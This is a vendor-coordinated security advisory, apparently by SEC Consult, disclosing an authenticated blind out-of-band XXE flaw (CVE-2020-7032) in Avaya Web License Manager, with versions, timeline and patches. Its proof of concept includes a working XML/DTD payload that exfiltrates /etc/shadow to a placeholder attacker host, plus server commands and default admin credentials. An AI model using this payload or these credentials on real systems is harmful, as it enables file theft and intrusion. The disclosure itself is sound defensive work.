Blind Out-Of-Band XML External Entity Injection in Avaya Web License Manager

Project Description

By using an XXE injection it is possible to read confidential data like /etc/shadow or private keys. In addition, a special payload can affect the availability of the web application.


Vendor description

“As a global leader in delivering superior communications experiences, Avaya provides the most complete portfolio of software and services for multi-touch contact center and unified communications offered on premises, in the cloud, or a hybrid. Today’s digital world centers on communications enablement, and no other company is better positioned to do this than Avaya.”

Source: https://www.avaya.com/en/

Business recommendation

The vendor provides a patch for the Avaya Web License Manager which should be installed immediately.

SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues.

Vulnerability overview/description

Blind Out-Of-Band XML External Entity Injection (CVE-2020-7032)

This vulnerability within the Avaya Web License Manager (WebLM) allows an authenticated user to read arbitrary files in the context of the Webserver (Tomcat) by uploading a specially crafted XML file within the License upload functionality. Accessible sensitive files that can be read are for example /etc/shadow, SSH keys or other configuration files.

Proof of concept

Blind Out-Of-Band XML External Entity Injection (CVE-2020-7032)

Login as a user to https://$IP/WebLM/ and navigate to “Install License”. If WebLM has never been used before or not hardened, the default credentials are admin:weblmadmin

Create an XML file like the following:

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://$ATTACKER_IP/xxe_file.dtd">
%asd;
%c;
]>
<a>&rrr;</a>

and a DTD file like:

<!ENTITY % d SYSTEM "file:///etc/shadow"> 
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://$ATTACKER_IP:2121/%d;'>">

Start a webserver, e.g.

SimpleHTTPServer
python -m SimpleHTTPServer 80

and an FTP Server like GO XXE FTP Server

./xxeserv 2121

Upload the crafted XML file by clicking the install button.

 

Vulnerable / tested versions

The following version has been tested:

  • Avaya Web License Manager 6.3

The vendor doesn’t support versions < 7.x. Probably all versions <7 are affected.

Vendor contact timeline

2020-03-18Contacting vendor through securityalerts@avaya.com
2020-03-19Vendor replied and started the process to verify the vulnerability
2020-04-03Second mail to vendor to check if they have verified the issue
2020-05-18Release of Hotfix for WebLM (embedded with SMGR) version 8.1.2.x
2020-07-01Advisory release postponed, due to a delayed patch for version 7
2020-11-16Patch release for version 7 and 8 of WebLM standalone and SMGR
2020-11-17Publication of the advisory

Solution

Version 6: Upgrade to a new major release

Version 7: Upgrade to 7.1.3.7 or later

Version 8: Install hot fix #7 or upgrade to version 8.1.3

Offiial patch: https://downloads.avaya.com/css/P8/documents/101072249

Workaround

No workaround available.

Advisory URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

EOF Markus Koplin / @2020

Interested to work with the experts of SEC Consult? Send us your application
Want to improve your own cyber security with the experts of SEC Consult? Contact our local offices.

Project Details

  • TitleBlind Out-Of-Band XML External Entity Injection (Authenticated)
  • ProductAvaya Web License Manager
  • Vulnerable version6.x, 7.0 through 7.1.3.6, 8.0 through 8.1.2.0.0
  • Fixed version7.1.3.7 and 8.1.3
  • CVE numberCVE-2020-7032
  • ImpactMedium
  • Homepagehttps://www.avaya.com/en/
  • Found03/2020
  • ByM. Koplin (Office Munich) | SEC Consult Vulnerability Lab